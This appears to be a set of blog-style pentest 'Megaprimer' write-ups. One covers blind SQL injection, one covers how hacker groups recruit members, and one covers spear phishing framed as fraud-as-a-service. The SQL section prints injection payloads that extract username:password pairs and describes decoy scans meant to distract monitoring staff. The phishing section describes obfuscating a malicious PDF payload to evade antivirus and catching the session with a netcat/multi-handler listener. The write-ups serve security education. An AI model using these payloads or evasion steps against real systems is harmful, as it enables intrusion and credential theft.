THE LIFE OF AN INJECTION

[<MEGAPRIMER 1.0.7> LESS IS MORE <GREP> MYSQL>BLIND SQL INJECTION]

Going Blind and finding your way
An assignment is requested as follows.You are required to conduct a pentest on a clients simulated research and Development Lab environment.While being debriefed,you get to interact with the network administrator who happens to be a Cisco Expert and Snort Certified Professional who has set up the militarized test environment with state of the art security defense mechanisms .Moreover,you get to know that they recently installed a web based firewall.You are required to compromise the installation so as to enable the organisation secure itself against future risk exposures.
Deliverable:Own the BOX

ssvforensic labs:Tool Kit for this operation not limited to;

Case  Undisclosed company Y

411 about the firm   ERP Software Development

Mission        Pita_Katikati_Yao

Objective    Pawn and Own 

RV choice Kali Linux[Burp Suite/Zap,Sql Cheat-sheet,WebShell,Hosting,Tcpdump & FireBug]

POC             Samples Below

SAMPLE OF THE THEORETICAL POC METHODOLOGY
The tactics and strategies used by a shaolin disciple during combat are intelligent application generalized by some of the best warriors in the past
This is synonymous with **Ancient Principles for future Battle Fields**the BackTrack Mantra.The below can be summarised as the 5 rules of thumb for any Whitehat,Black hat or GreyHat not to forget our RedHat buddies from Odays ago,the Oracle is listening.......

RULES OF THUMB

1. Signal to the East,strike to the West;
2. Avoid an opponents strong points,strike the weak ones;
3. Trick an opponent into advancing without success
4. If an opponent is strong,enter from the side, if weak,enter from the front
5. USE MINIMUM FORCE to neutralize maximum strength.

Layered Defence Approach adopted versus a potential threat via sql injection

SAMPLE OF THE THEORETICAL SETUP METHODOLOGY
After carefully assessing (Rule No 2&4),going for the web server was logical than the other options which were highly monitored.Now to fool the technical team monitoring the systems,we install a 4 custom vm setups(we only discuss two for reason known to us),one thats host based and the other with "custom virtual network" to be used as a decoy when running the automated scan using nmap,we also deliberately fail to flag nmap from doing a stealth scan and we also set -p to 1-65500, the aim being we need the administrators to pay more attention on the IPS and IDS(Rule No 1).We also create a cron job for our bash script on one of the vm to loop other scans as well as nmap(Rule No 3)
SAMPLE OF THE BLIND SQL INJECTION POC
Using (Rule N0 5),a sample of the blind sql injections used to own the box.
http://xxxxxxxxxxx/and 1=1  
and 1=2 <--- Boolean false -- and 1=1 <--- Boolean true -- The page loads 
The mysql version 5:To get the version in blind attack we use "substring."
http://xxxxxxxxxxx/and substring(@@version,1,1)=5
Getting database tables and columns we use  limit 0,1
http://xxxxxxxxxxx/and (select 1 from mysql.table limit 0,1)=1
our query here returns 1 row of data since  sub select returns only 1 row
We now use the above  method to continuous get more tables and  columns.
Pulling Charactors from the users tables
ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
When > 0 returns false we know that we have reach the end.We later use the ascii converter to know what the strings are and come up with letters

Conclusions
According to OWASP TOP 10 2013 injections are the number one threat facing systems.Below is an illustration of injections and impact on to the business.

As security analyst and penetration tester,OWASP has provided a framework as a baseline for testing,to help developers, testers, and application security specialists understand how to efficiently and effectively test the security of web applications.for more info click here.
For application pen tester's wanting to get their hands dirty,try mutillidae and burp suite as your test environment and the rest as they say is history.I wish to remind you that as a security analyst, seek to provide an acceptable level of security for your client by emphasizing that the word secure does not exist in our current  world.
Special Thanks:Credits for  reference from OSAWP  & Sun Tzu(Art of War) my Defacto Mentor

Recruitment of Hackers

[<MEGAPRIMER 1.0.6.1> FRAUD <B>FRAUD RECRUITMENT>HACKER RECRUITMENT]

Getting a Job as a Hacker

An assignment is requested as follows:Recently,multiple government sites in a certain region of our world has been victim to defacing and DDOS.Its your job first understand how this online gang operates with the view of infiltrating and dismantling the group.The c-level in organisation X need an executive summary on how recruitment is carried out by this gangs and a rationale of what motivates this kind of illegal groups.

Deliverable:Explain how hackers are recruited in the black market.

ssvforensic labs:Tool Kit for this operation not limited to;

Case  Undisclosed X company

411 about the firm Private Contractor

Mission        home_and_away

Objective   Underground Recruitment of Hackers

RV choice   Kali Linux[Maltego Casefile,Graph Search,IRC,Twitter,socialNet,GREP,Google]

POC                 Sample Below

Sample of POC on how these three elements aid in the recruitment process

For fraud to take place,3 elements have to be present;

1.Rationalization >> 2.Perceived opportunity >> 3.Perceived pressure.

In order to understand this phenomena, three rationales can be used;

1.Zero Order reasoning >> 2.First Order reasoning >> 3.Higher Order reasoning.Our discussion is limited to first order reasoning in which we are considering the condition s that directly affect the hacker.To do that lets consider this with a visual aid.

With hackers , the greater the perceived opportunity or the more intense the pressure(Mostly financial or vice), the less rationalization it takes to motivate someone to commit fraud. Likewise,the more dishonest a perpetrator is, the less opportunity and / or pressure it takes to motivate fraud.It must be understood that hacking or any forms of hacking are and is fraud.

SAMPLE OF THE POC ON RECRUITMENT

How is the organisation and leadership of any hackers or hacking legions created ?Power is the single most element that catalyses organisation and recruitment of any hacking entities.How ?

In 1947, Max Weber  introduced power as the probability that a person can carry out his or her own will despite resistance. When a hack takes place, the conspirator has the desire to carry out his or her own will—influence another person to act and do as the perpetrator wishes—regardless of resistance.Consider the below diagram on the recruitment process of hacktivist groups

.

The effectiveness of the perpetrator to influence the potential recruit depends upon the susceptibility of the victim as well as the perpetrator’s ability to manipulate the various types of power. The figure, is interactive,meaning that the more susceptible a victim is to the various types of power, the less effective the perpetrator has to be for recruitment to occur. Often, after the initial victim is recruited into the fraud scheme,that individual will then become a conspirator (in position A) and begin to influence other individuals to participate in the fraud.

conclusions

In conclusion,as a security analyst,its importance to understand that fraud examination provides insights to the likelyhoods of hacking activities.As a security consultant,it is prudent to know who you are dealing with and how to set up counter measures to mitigate security related issues.A mere pentest only serves to inform your client of vulnerabilities but remember risk assesement by any standard  be it COBIT,COSO,NIST or ISO is a 4 to 6 tier  process model.To my fellow security analysts,olympics is over so wacheni mchezo,tufanye kazi mzuri
Special Thanks:Credits  to  Prof.XYZ(Risk Analysis)  & Sun Tzu(Art of War) my Defacto Mentor

Fraud As A Service

[<MEGAPRIMER 1.0.6> FRAUD <A>SOCIAL ENGINEERING> SPEAR PHISHING]

Commiting Fraud using Social Engineering

An assignment is requested as follows:Conduct a risk assessment using passive non-intrusive means and gain access to a fortune 500 company in one week so as to address the risk posed by fraud in an corporate environment.

Deliverable:Use theoretical and technical non-intrusive means in your POC.

Sample of how the problem was solved

Fraud is defined as the multifarious means which human ingenuity can devise, which are resorted to by one individual, to get an advantage over another by false representations.

For fraud to happen,3 elements have to be present;

1.Rationalization >> 2.Perceived opportunity >> 3.Perceived pressure

Fraudsters Aka Hackers will use systematic social engineering as per below

ssvforensic labs:The tool Kit for this operation not limited to;

Use Passive  non-intrusive means to gain access and leave stones unturned

Case  Fortune 500 company

411 about the firm Fortune worth in the excess of 2 Billion Dollars

Mission        Charles_Ponzi

Objective    Impact  of  pseudo frauds with the advent of  Fraud- As-A-Service(FAAS)

RV choice   Kali Linux[Maltego,rapportive,facebook,Total AV,rootkit,jigsaw,glassdoor]

POC                 Below

Sample Theoretical principle on Fraud in relation to social Engineering

Sample of the Technical detail using phishing techniques

The payload is encrypted with shikata_ga_nai obfuscated 100 times

This did  not work due to the  latest signature based   proactive defence technologies.We later use PEScrambler and other undisclosed tool  to encrypt it more so as to bypass vendor based AV signatures. PEScrambler is a tool to obfuscates win32 binaries automatically. It can relocate portions of code and protect them with anti-disassembly code. It also defeats static program flow analysis by re-routing all function calls through a central dispatcher function.We finally use totalAV to perform a malware net scan which yields {+}A detection ration of 0:47 against major antivirus scanners is desirable. None of the top vendor’s signatures is able to detect the malicious PDF

Finally,use the transporter[sendmail] to send the package and hope netcat listens to something nice from your multi-handler,7/10 times it will as shown below
In conclusion,information is the new money.Fraud-As-A-Service(FAAS) is an organised scheme used by techno-savvy fraudsters to embezzle billions from companies.The three affected elements of non-cash frauds are a)Inventory b)Securities and c)Information.